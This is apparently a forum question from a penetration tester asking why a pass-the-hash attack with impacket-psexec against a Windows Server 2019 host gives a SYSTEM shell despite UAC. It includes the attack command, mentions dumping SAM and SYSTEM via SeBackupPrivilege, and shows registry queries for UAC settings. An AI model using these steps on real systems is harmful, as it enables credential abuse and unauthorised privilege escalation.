29Şub
Pass-the-hash, why do I get a shell with high integrity?
I am testing the security of a Windows Server 2019 machine and have a question about remote access to the machine.
The user on the machine has the permission "SeBackupPrivilege". I can therefore dump the "Administrator" user's SAM and SYSTEM.
whoami /all
...
SeBackupPrivilege Back up files and directories Disabled
...
I then used the Administrator user's NTHash with PsExec to do a pass-the-hash attack. After doing this attack I get a shell with high integrity.
impacket-psexec -hashes :[NTHASH_HERE] administrator@10.10.10.10
C:\Windows\system32> whoami
nt authority\system
My question is, why do I get a shell with high integrity? Shouldn't UAC prevent this behavior? I would expect a shell with low integrity, given these settings as well:
UAC is enabled:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
LocalAccountTokenFilterPolicy is the default value:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy
ERROR: The system was unable to find the specified registry key or value.
FilterAdministratorToken is the default value:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken
ERROR: The system was unable to find the specified registry key or value.
To anyone who can clarify this doubt for me...thank you.